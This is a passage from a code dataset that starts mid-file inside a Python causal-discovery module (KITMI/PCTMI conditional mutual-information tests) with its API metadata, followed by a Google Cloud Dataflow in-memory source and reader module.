len(r_list) > 0:\n # rt_1 = r.iloc[:-1].values\n r_1_dict = dict()\n for r_i in r_list:\n r_1_dict[self.names[r_i]] = self.series[self.names[r_i]].copy()\n pt_1, qt, r_1_dict = self.align_pqr(pt_1, qt, idx_q, r_1_dict, k)\n\n # Dict to df\n rt_1 = pd.DataFrame()\n for name in r_1_dict.keys():\n if isinstance(r_1_dict[name], pd.Series):\n r_1_dict[name] = r_1_dict[name].to_frame()\n rt_1[r_1_dict[name].columns] = r_1_dict[name].reset_index(drop=True)\n rt_1 = rt_1.values\n else:\n rt_1 = None\n\n qt = qt.values\n pt_1 = pt_1.values\n\n cmi = TestMI()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def causation_entropy_simple(self, p, q, r_list=[], k=10):\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n\n qt = qt.iloc[1:].values\n pt_1 = pt_1.iloc[:-1].values\n if len(r_list) > 0:\n rt_1 = self.series[self.names[r_list]].copy()\n rt_1 = rt_1.iloc[:-1].values\n\n else:\n rt_1 = None\n\n cmi = TestMI()\n # cmi = TestParCorr()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def progressive_removal_of_non_causal_nodes(self):\n if self.verbose:\n print(\"######################################\")\n print(\"Progressive Removal of Non-Causal Nodes\")\n print(\"######################################\")\n\n parents = dict()\n for q in range(self.d):\n parents[self.names[q]] = []\n for p in range(self.d):\n if p != q:\n if self.graph.edges[p, q] == 2:\n parents[self.names[q]].append(self.names[p])\n else:\n parents[self.names[q]].append(self.names[q])\n print(parents)\n\n for q in range(self.d):\n name_q = self.series.columns[q]\n # series_q = self.series[name_q]\n parents_q = parents[name_q].copy()\n for name_p in parents_q:\n p = self.names.tolist().index(name_p)\n parents_q_without_p = list(set(parents[self.series.columns[q]]) - {name_p})\n r_list = []\n for par_name in parents_q_without_p:\n r_list.append(self.names.tolist().index(par_name))\n # series_p = self.series[name_p]\n # series_cond = self.series[parents_q_without_p]\n print(name_p, name_q)\n pval = self.causation_entropy_simple(p, q, r_list)\n if self.verbose:\n print('CE('+name_p+'->'+name_q+'|'+str(parents_q_without_p)+') = '+str(pval))\n if pval > self.sig_lev:\n if self.verbose:\n print('Remove '+name_p+' from parents of '+name_q)\n parents[self.series.columns[q]].remove(name_p)\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n\n def fit(self):\n \"\"\"\n run KITMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # Progressive Removal of Non-Causal Nodes\n self.progressive_removal_of_non_causal_nodes()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\n def _mi_pq(self, p, q):\n \"\"\"\n estimate tmi between two time series\n :param p: time series with index p\n :param q: time series with index q\n :return: p, q and the estimated value of tmi(p,q)\n \"\"\"\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], 
windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n            print(\"Nodes and windows:\")\n            print(self.names[p], self.window_matrix[self.names[q]].loc[self.names[p]])\n            print(self.names[q], self.window_matrix[self.names[p]].loc[self.names[q]])\n        else:\n            x = self.data_dict[self.names[p]]\n            y = self.data_dict[self.names[q]]\n\n        mi_pval, mi_val = tmi(x, y, sampling_rate_tuple=(self.sampling_rate[self.names[p]],\n                                                         self.sampling_rate[self.names[q]]),\n                              gamma=self.gamma_matrix[self.names[q]].loc[self.names[p]], p_value=self.p_value)\n        # mi_pval, mi_val = ctmi(x, y, None, self.names[p], self.names[q], self.sampling_rate,\n        #                        gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value)\n        return p, q, mi_pval\n\n    def skeleton_initialize(self):\n        \"\"\"\n        initialize graph, remove all unconditional independencies and rank neighbors\n        \"\"\"\n        if self.verbose:\n            print(\"######################################\")\n            print(\"Skeleton Initialization\")\n            print(\"######################################\")\n\n        # p_list, q_list = np.where(np.triu(self.graph.edges) > 0)\n        p_list, q_list = np.where((np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges))) == 2)\n        print(self.graph.edges)\n        print(np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges)))\n        print(p_list, q_list)\n        res = Parallel(n_jobs=self.num_processor)(delayed(self._mi_pq)(p, q) for p, q in zip(p_list, q_list))\n\n        for pq in range(len(res)):\n            p, q, mi = res[pq][0], res[pq][1], res[pq][2]\n            self.mi_array[p, q] = mi\n            self.mi_array[q, p] = mi\n            if self.verbose:\n                print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; I(p,q)=\" + \"{: 0.5f}\".format(self.mi_array[p, q]), end=\" \")\n            if self.p_value:\n                test = self.mi_array[p, q] > self.sig_lev\n            else:\n                test = self.mi_array[p, q] < self.alpha\n            if test:\n                if self.verbose:\n                    print(\"=> Remove link between \"+str(p)+\" and \"+str(q))\n                self.graph.edges[p, q] = 0\n                self.graph.edges[q, p] = 0\n            else:\n                if self.verbose:\n                    print()\n\n    def _cmi_sep_set_pq(self, p, q, set_size):\n        \"\"\"\n        estimate ctmi between two time series conditioned on each set of neighbors with cardinality equal to set_size\n        :param p: time series with index p\n        :param q: time series with index q\n        :param set_size: cardinality of the set of neighbors\n        :return: p, q, list of estimated values of ctmi(p,q,r_set), and list of all r_sets\n        \"\"\"\n        v_list = []\n        r_list = [r for r in range(self.graph.d) if (r != p) and (r != q) and ((\n                (self.graph.edges[r, p] == 2) and (self.gamma_matrix[self.names[p]].loc[self.names[r]] >= 0)) or (\n                (self.graph.edges[r, q] == 2) and (self.gamma_matrix[self.names[q]].loc[self.names[r]] >= 0)))]\n\n        r_list = [list(r) for r in itertools.combinations(r_list, set_size)]\n\n        r_list_temp = r_list.copy()\n        # if set_size == 1:\n        for rs in r_list_temp:\n            print(rs)\n            print(all(elem >= self.d for elem in rs))\n            if all(elem >= self.d for elem in rs):\n                r_list.remove(rs)\n        del r_list_temp\n\n        if self.adaptive_window:\n            x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n            y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n        else:\n            x = self.data_dict[self.names[p]]\n            y = self.data_dict[self.names[q]]\n\n        for rs in r_list:\n            z = dict()\n            for r in rs:\n                if self.adaptive_window:\n                    # select and drop NA\n                    z[self.names[r]] = self.series[self.names[r]].dropna()\n                else:\n                    z[self.names[r]] = self.data_dict[self.names[r]]\n            if self.graphical_optimization:\n                # cmi_pval, 
cmi_val = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                #                        gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n                #                        graph=self.graph.edges)\n                cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                                         gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n                                         p_value=self.rank_using_p_value, instantaneous_dict=self.instantaneous_dict)\n            else:\n                cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                                         gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n                                         instantaneous_dict=self.instantaneous_dict)\n\n            if self.rank_using_p_value:\n                v_list.append(cmi_pval)\n            else:\n                v_list.append(cmi_val)\n        if v_list:\n            return p, q, v_list, r_list\n\n    def rank_cmi_sep_set_parallel(self, set_size):\n        \"\"\"\n        rank pairs of time series based on the estimation of ctmi between each pair of connected time series\n        :param set_size: cardinality of the set of neighbors\n        :return: ranking of each pair of connected time series based on ctmi\n        \"\"\"\n        list_adj, list_num_adj = self.graph.search_adj_all()\n        p_list = [p for p in range(len(list_num_adj)) if list_num_adj[p] > set_size]\n        print(p_list)\n        q_list = [list_adj[p] for p in p_list]\n        p_list = [p_list[p] for p in range(len(p_list)) for _ in q_list[p]]\n        q_list = [q for sublist in q_list for q in sublist]\n        pq_list = [(p, q) for p, q in zip(p_list, q_list)]\n        temp_pq = pq_list.copy()\n        temp_p = p_list.copy()\n        temp_q = q_list.copy()\n        for pq in range(len(temp_pq)):\n            if (temp_pq[pq][1], temp_pq[pq][0]) in pq_list:\n                pq_list.remove((temp_pq[pq][0], temp_pq[pq][1]))\n                p_list.remove(temp_p[pq])\n                q_list.remove(temp_q[pq])\n        del temp_pq, temp_p, temp_q\n        print(list_adj, list_num_adj)\n        print(p_list, q_list)\n        print(\"set_size \" +str(set_size))\n        # res = Parallel(n_jobs=self.num_processor)(delayed(self._cmi_sep_set_pq)(p, q, set_size) for p, q in\n        #                                           zip(p_list, q_list))\n        res = []\n        for p, q in zip(p_list, q_list):\n            res.append(self._cmi_sep_set_pq(p, q, set_size))\n\n        ranks = RankingList()\n        for pq in range(len(res)):\n            if res[pq] is not None:\n                if isinstance(res[pq][2], list):\n                    for r in range(len(res[pq][2])):\n                        ranks.add(res[pq][0], res[pq][1], res[pq][2][r], res[pq][3][r])\n                else:\n                    ranks.add(res[pq][0], res[pq][1], res[pq][2], res[pq][3])\n        if self.rank_using_p_value:\n            ranks.sort(descending=True)\n        else:\n            ranks.sort(descending=False)\n        return ranks\n\n    def find_sep_set(self):\n        \"\"\"\n        find the most contributing separation set (if it exists) between each pair of time series\n        \"\"\"\n        if self.verbose:\n            print(\"######################################\")\n            print(\"Skeleton Separation\")\n            print(\"######################################\")\n\n        print(\"max set size = \" + str(self.graph.d-1))\n        for set_size in range(1, self.graph.d-1):\n            ranks = self.rank_cmi_sep_set_parallel(set_size)\n            if self.verbose:\n                print(\"Ranking:\")\n                print(\"p: \"+str(ranks.elem_p))\n                print(\"q: \" + str(ranks.elem_q))\n                print(\"r: \" + str(ranks.elem_r))\n                print(\"val: \" + str(ranks.val))\n            for p, q, r_set, cmi in zip(ranks.elem_p, ranks.elem_q, ranks.elem_r, ranks.val):\n                test = (self.graph.edges[p, q] != 0)\n                for r in r_set:\n                    if not test:\n                        break\n                    test = test and ((self.graph.edges[q, r] != 0) or (self.graph.edges[p, r] != 0))\n                    # test = test and ((self.graph.sep[p, r, q] == 0) and (self.graph.sep[q, r, p] == 0))\n                if test:\n                    mi = self.mi_array[p, q]\n\n                    if self.p_value != self.rank_using_p_value:\n                        if self.adaptive_window:\n                            x = window_representation(self.series[self.names[p]],\n                                                      
windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]],\n windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n z = dict()\n for r in r_set:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi, _ = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.p_value, graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n else:\n cmi, _ = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.p_value,\n instantaneous_dict=self.instantaneous_dict)\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; r=\" + str(r_set) + \"; I(p,q|r)=\" + \"{: 0.5f}\".format(\n cmi) + \"; I(p,q)=\" + \"{: 0.5f}\".format(mi), end=\" \")\n\n if self.p_value:\n test = mi < self.sig_lev < cmi\n else:\n test = cmi < self.alpha\n if test:\n self.cmi_array[p, q] = cmi\n self.cmi_array[q, p] = cmi\n if self.verbose:\n print(\"=> remove link between \" + str(p) + \" and \" + str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n for r in r_set:\n self.graph.add_sep(q, p, r)\n self.biggamma[p,q,r] = self.gamma_matrix[self.names[p]].loc[self.names[r]]\n self.biggamma[q,p,r] = self.gamma_matrix[self.names[q]].loc[self.names[r]]\n else:\n if self.verbose:\n print()\n # self._exclude_past()\n\n def fit2(self):\n \"\"\"\n run PCTMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # initialize skeleton\n self.skeleton_initialize()\n\n # get separation sets\n self.find_sep_set()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\nif __name__ == \"__main__\":\n from data.sim_data import generate_v_structure, generate_fork, diamond_generator, generate_mediator, mooij_7ts\n\n # data = generate_v_structure(2000)\n data = generate_fork(1000)\n # data, _, _ = diamond_generator(2000)\n # data.drop([data.columns[1]], axis=1, inplace=True)\n\n lag = 5\n # d = len(data.columns)\n\n n_iters = 1000\n hidden_size = 25 # d*(order-1)*2\n learning_rate = 0.01\n # input_size = 3\n\n # res = tskiko_mv(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n res = nbcb_k(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n print(res)\n # print(res['discovery'])\n\n # x = mts_order(data, order=order) #[:-order]\n # print(x.loc[2:5])\n # # y = mts_order(data[order+1:], order=order)\n # names_x = x.columns[:-d]\n # names_y = x.columns[-d:]\n # y = x[names_y]\n # x = x[names_x]\n # print(x.shape)\n # print(y.shape)\n", "sub_path": "baselines/scripts_python/python_packages/pwNBCBk/kitmi.py", "file_name": "kitmi.py", "file_ext": "py", 
"file_size_in_byte": 56359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.CMIknn", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.ParCorr", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 201, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}, {"api_name": 
"torch.tensor", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 296, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "time.time", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 415, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 425, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 443, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 457, "usage_type": "call"}, {"api_name": "time.time", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 512, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 518, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 524, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 529, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 532, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 569, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 572, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 576, 
"usage_type": "call"}, {"api_name": "torch.float", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 600, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 602, "usage_type": "call"}, {"api_name": "time.time", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 727, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 744, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 745, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.get_sampling_rate", "line_number": 810, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.get_alpha", "line_number": 813, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 819, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.align_matrix", "line_number": 826, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 830, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 856, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 860, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 863, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 905, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 906, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 921, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 998, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1021, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1058, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1060, "usage_type": "attribute"}, {"api_name": 
"datetime.datetime.now", "line_number": 1139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1139, "usage_type": "name"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1165, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1166, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.tmi", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1193, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1193, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 1195, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 1195, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 1229, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1241, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1242, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1259, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1263, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1349, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1351, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1367, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1372, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1406, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1406, "usage_type": "name"}, {"api_name": "data.sim_data", "line_number": 1431, "usage_type": "name"}, {"api_name": "data.sim_data.generate_fork", "line_number": 1431, "usage_type": "call"}, {"api_name": "data.sim_data", "line_number": 1444, "usage_type": "argument"}]}
+{"seq_id": "461396696", "text": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"In-memory input source.\"\"\"\n\nimport itertools\n\nfrom google.cloud.dataflow import coders\nfrom google.cloud.dataflow.io import iobase\n\n\nclass InMemorySource(iobase.NativeSource):\n \"\"\"In-memory input source.\"\"\"\n\n def __init__(\n self, elements, coder=coders.Base64PickleCoder(), start_index=None,\n end_index=None):\n self.elements = elements\n self.coder = coder\n\n if start_index is None:\n self.start_index = 0\n else:\n self.start_index = start_index\n\n if end_index is None:\n self.end_index = len(elements)\n else:\n self.end_index = end_index\n\n def __eq__(self, other):\n return (self.elements == other.elements and\n self.coder == other.coder and\n self.start_index == other.start_index and\n self.end_index == other.end_index)\n\n def reader(self):\n return InMemoryReader(self)\n\n\nclass InMemoryReader(iobase.NativeSourceReader):\n \"\"\"A reader for in-memory source.\"\"\"\n\n def __init__(self, source):\n self.source = source\n\n # Index of the next item to be read by the InMemoryReader.\n # Starts at source.start_index.\n self.current_index = source.start_index\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n def __iter__(self):\n for value in itertools.islice(self.source.elements,\n self.source.start_index,\n self.source.end_index):\n self.current_index += 1\n yield self.source.coder.decode(value)\n\n def get_progress(self):\n if (self.current_index >= self.source.end_index or\n self.source.start_index >= self.source.end_index):\n percent_complete = 1\n elif self.current_index == self.source.start_index:\n percent_complete = 0\n else:\n percent_complete = (\n float(self.current_index - self.source.start_index) / (\n self.source.end_index - self.source.start_index))\n\n return iobase.ReaderProgress(percent_complete=percent_complete)\n", "sub_path": "google/cloud/dataflow/worker/inmemory.py", "file_name": "inmemory.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.dataflow.io.iobase.NativeSource", "line_number": 23, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 23, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.coders.Base64PickleCoder", "line_number": 27, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.coders", "line_number": 27, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.io.iobase.NativeSourceReader", "line_number": 52, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 52, "usage_type": "name"}, {"api_name": "itertools.islice", "line_number": 69, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase.ReaderProgress", "line_number": 86, "usage_type": "call"}, {"api_name": 
"google.cloud.dataflow.io.iobase", "line_number": 86, "usage_type": "name"}]}
